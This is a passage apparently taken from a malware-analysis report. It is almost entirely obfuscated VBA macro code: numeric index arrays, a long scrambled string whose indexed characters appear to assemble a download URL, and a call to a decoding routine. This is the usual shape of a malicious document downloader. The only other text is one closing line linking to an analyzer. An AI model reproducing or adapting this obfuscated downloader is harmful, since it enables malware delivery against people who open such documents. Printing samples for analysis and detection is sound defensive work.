oPShajm(3) = 170
oPShajm(4) = 63
oPShajm(5) = 41
oPShajm(6) = 41
oPShajm(7) = 5
oPShajm(8) = 56
oPShajm(9) = 50
oPShajm(10) = 126
oPShajm(11) = 67
oPShajm(12) = 21
oPShajm(13) = 67
oPShajm(14) = 22
oPShajm(15) = 86
oPShajm(16) = 2
oPShajm(17) = 31
oPShajm(18) = 56
oPShajm(19) = 50
oPShajm(20) = 5
oPShajm(21) = 31
oPShajm(22) = 15
oPShajm(23) = 150
oPShajm(24) = 126
oPShajm(25) = 22
oPShajm(26) = 41
oPShajm(27) = 31
oPShajm(28) = 79
oPShajm(29) = 86
oPShajm(30) = 8
oPShajm(31) = 67
oPShajm(32) = 147
oPShajm(33) = 41
oPShajm(34) = 267
oPShajm(35) = 17
oPShajm(36) = 42
oPShajm(37) = 6
oPShajm(38) = 22
oPShajm(39) = 41
oPShajm(40) = 45
oPShajm(41) = 133
oPShajm(42) = 201
oPShajm(43) = 170
oPShajm(44) = 232
oPShajm(45) = 150
oPShajm(46) = 215
oPShajm(47) = 175
oPShajm(48) = 185
oPShajm(49) = 286
oPShajm(50) = 192
oPShajm(51) = 225
oPShajm(52) = 180
oPShajm(53) = 65
oPShajm(54) = 29
oPShajm(55) = 120
oPShajm(56) = 176
oPShajm(57) = 267
oPShajm(58) = 20
oPShajm(59) = 207
oPShajm(60) = 97
oPShajm(61) = 10
oPShajm(62) = 216
vajUdNG = vdQtmDhS(AaShHs, oPShajm, ZGGnRhG)
Dim mXi As String
Dim CSNI As String
Dim mtHJP(54) As Long
Dim CgjRUBGi As Long
CgjRUBGi = 52
CSNI = "hREiVASYREVdTATbtXrrJbIHtSSVWVpmiJPz.NFotgrlMEYhhAxtgntiPkeyjBeokrexRGWjctGSqhCshHQrkCSTxAZHrtBDKCGtRJOlnoNLoEvYXTiQvQiJVpTBuGXZtpNrUkClnuiAQZXfusEo/pSQCpLGRsNmoSmyUFbnrXanALXrbFFWzsKyolWodqlSmUTlziXYCOaLGNfSrkyPJWjwQoWbVjPdzRutKHvL-QpiOazrvjLeeF/wnshfuosafnvq/GxbDuhXCsulIoVGoWCITrabXMuuHpGnaSeZclhrBolLwZgQvXfIAYedDhYsATp/eiRubtvDXIWWTwpMSvnDurIIStn/tuQs:zFCsFMQzknigeJXWemePRWZIgHPDtJHYkxtodpZhUnSUzHmYsOFmcDFbskvTaRldcVLnWxXpHywJrxrgLQy"
mtHJP(0) = 1
mtHJP(1) = 17
mtHJP(2) = 17
mtHJP(3) = 31
mtHJP(4) = 357
mtHJP(5) = 149
mtHJP(6) = 149
mtHJP(7) = 80
mtHJP(8) = 31
mtHJP(9) = 4
mtHJP(10) = 19
mtHJP(11) = 4
mtHJP(12) = 17
mtHJP(13) = 125
mtHJP(14) = 171
mtHJP(15) = 44
mtHJP(16) = 40
mtHJP(17) = 125
mtHJP(18) = 17
mtHJP(19) = 12
mtHJP(20) = 40
mtHJP(21) = 40
mtHJP(22) = 19
mtHJP(23) = 171
mtHJP(24) = 12
mtHJP(25) = 111
mtHJP(26) = 59
mtHJP(27) = 54
mtHJP(28) = 17
mtHJP(29) = 125
mtHJP(30) = 19
mtHJP(31) = 59
mtHJP(32) = 80
mtHJP(33) = 37
mtHJP(34) = 40
mtHJP(35) = 19
mtHJP(36) = 42
mtHJP(37) = 149
mtHJP(38) = 73
mtHJP(39) = 42
mtHJP(40) = 4
mtHJP(41) = 233
mtHJP(42) = 16
mtHJP(43) = 4
mtHJP(44) = 54
mtHJP(45) = 149
mtHJP(46) = 42
mtHJP(47) = 144
…

Open this report in the interactive analyzer, or submit your own file for analysis.